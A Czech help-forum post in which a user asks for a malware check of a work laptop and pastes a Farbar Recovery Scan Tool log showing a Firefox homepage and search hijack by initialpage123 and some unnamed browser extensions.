Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Kontrola, pracovní NTB

Patříte mezi Vzorné návštěvníky? Pak je tato sekce pro vás.

Moderátor: Moderátoři

Pravidla fóra
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
Zamčeno
Zpráva
Autor
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Kontrola, pracovní NTB

#1 Příspěvek od Tesla »

Zdravím, prosím o kontrolu pracovního NTB.

MBAM mi stále hlásí havěť u nějakých přidaných pulginů Firefox (nic jsem neinstaloval).

FRST log zde, děkuji předem:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by tesla (administrator) on NTB-55 (09-04-2017 21:05:31)
Running from C:\Users\Tesla\Desktop
Loaded Profiles: tesla (Available Profiles: tesla)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpHostW.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpCardEngine.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Validity Sensors, Inc.) C:\Windows\System32\vcsFPService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe
() C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Hewlett-Packard Company) C:\Windows\SysWOW64\flcdlock.exe
(Hewlett-Packard Development Company) C:\Program Files (x86)\Hewlett-Packard\HP Device Access Manager\HP.ProtectTools.DeviceAccessManager.ServiceHost.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(Intel) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(DigitalPersona, Inc.) C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cistray.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Spotify Ltd) C:\Users\Tesla\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CORESHREDDER.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPConnectionManager.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [320360 2014-06-25] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7659224 2014-11-11] (Realtek Semiconductor)
HKLM\...\Run: [ISCT Tray] => c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe [5860656 2014-08-14] (Intel Corporation)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2863344 2014-10-31] (Synaptics Incorporated)
HKLM\...\Run: [COMODO Internet Security] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1476288 2017-04-05] (COMODO)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM-x32\...\Run: [HPConnectionManager] => c:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe [185144 2014-04-10] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QLBController] => C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe [425608 2014-10-04] (Hewlett-Packard Company)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [293872 2014-08-25] (Intel Corporation)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [YouCam Tray] => c:\Program Files (x86)\CyberLink\YouCam\YouCamTray.exe [167488 2013-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [HP File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\Coreshredder.exe [2213592 2014-02-05] (Hewlett-Packard)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28329912 2017-04-06] (Dropbox, Inc.)
HKLM\...\Winlogon: [Userinit] C:\Windows\system32\userinit.exe,c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe,
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [582784 2016-12-27] ()
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [Spotify Web Helper] => C:\Users\Tesla\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-04] (Spotify Ltd)
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
Lsa: [Notification Packages] DPPassFilter scecli
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 213.46.172.36 213.46.172.37
Tcpip\..\Interfaces\{A17B1C3A-B9EB-46A9-845E-AF78FF44CAEE}: [DhcpNameServer] 192.168.1.7
Tcpip\..\Interfaces\{AEC2C183-CD66-4548-AD0F-3B1F9522AA2A}: [DhcpNameServer] 213.46.172.36 213.46.172.37

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-04-08] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-04-08] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP File Sanitizer -> {3134413B-49B4-425C-98A5-893C1F195601} -> C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\IEBHO.dll [2014-02-05] (Hewlett-Packard)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: zjx1fd7i.default
FF ProfilePath: C:\Users\Tesla\AppData\Roaming\Mozilla\Firefox\Profiles\zjx1fd7i.default [2017-04-09]
FF NewTab: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF Homepage: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp
FF SearchPlugin: C:\Users\Tesla\AppData\Roaming\Mozilla\Firefox\Profiles\zjx1fd7i.default\searchplugins\59agja1f.xml [2017-04-08]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-24] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [dpmaxz_ng@jetpack] - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome
FF Extension: (HP Client Security Manager) - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome [2015-06-10] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-04-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-04-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2013-12-18] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2013-12-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-04-09] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-04-09] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-01-18] (Adobe Systems Inc.)
FF Plugin-x32: digitalpersona.com/ChromeDPAgent -> c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\components\npChromeDPAgent.dll [2014-06-26] (DigitalPersona, Inc.)

Chrome:
=======
CHR Profile: C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-09]
CHR Extension: (Adblock Plus) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-09]
CHR Extension: (Arabic) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-09]
CHR Extension: (HP Client Security Manager) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncffjdbbodifgldkcbhmiiljfcnbgjab [2017-04-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-09]
CHR Extension: (Adblock Pro) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocifcklkibdehekfnmflempfgjhbedch [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-09]
CHR Extension: (Chrome Media Router) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-09]
CHR HKLM-x32\...\Chrome\Extension: [ncffjdbbodifgldkcbhmiiljfcnbgjab] - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome.crx [2014-06-26]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [10508904 2017-04-05] (COMODO)
R3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876096 2017-04-05] (COMODO)
R2 CtAgentService; C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe [7168 2014-03-31] () [File not signed]
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-04-08] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-04-08] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-04-06] (Dropbox, Inc.)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
R2 DpHost; c:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpHostW.exe [500048 2014-07-28] (DigitalPersona, Inc.)
R2 FLCDLOCK; c:\windows\SysWOW64\flcdlock.exe [567608 2013-11-20] (Hewlett-Packard Company)
R2 HpDamServiceHost; c:\Program Files (x86)\Hewlett-Packard\HP Device Access Manager\HP.ProtectTools.DeviceAccessManager.ServiceHost.exe [18232 2013-11-15] (Hewlett-Packard Development Company)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-06-25] (Intel Corporation)
R2 iBtSiva; C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe [122984 2014-09-16] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [359848 2015-09-15] (Intel Corporation)
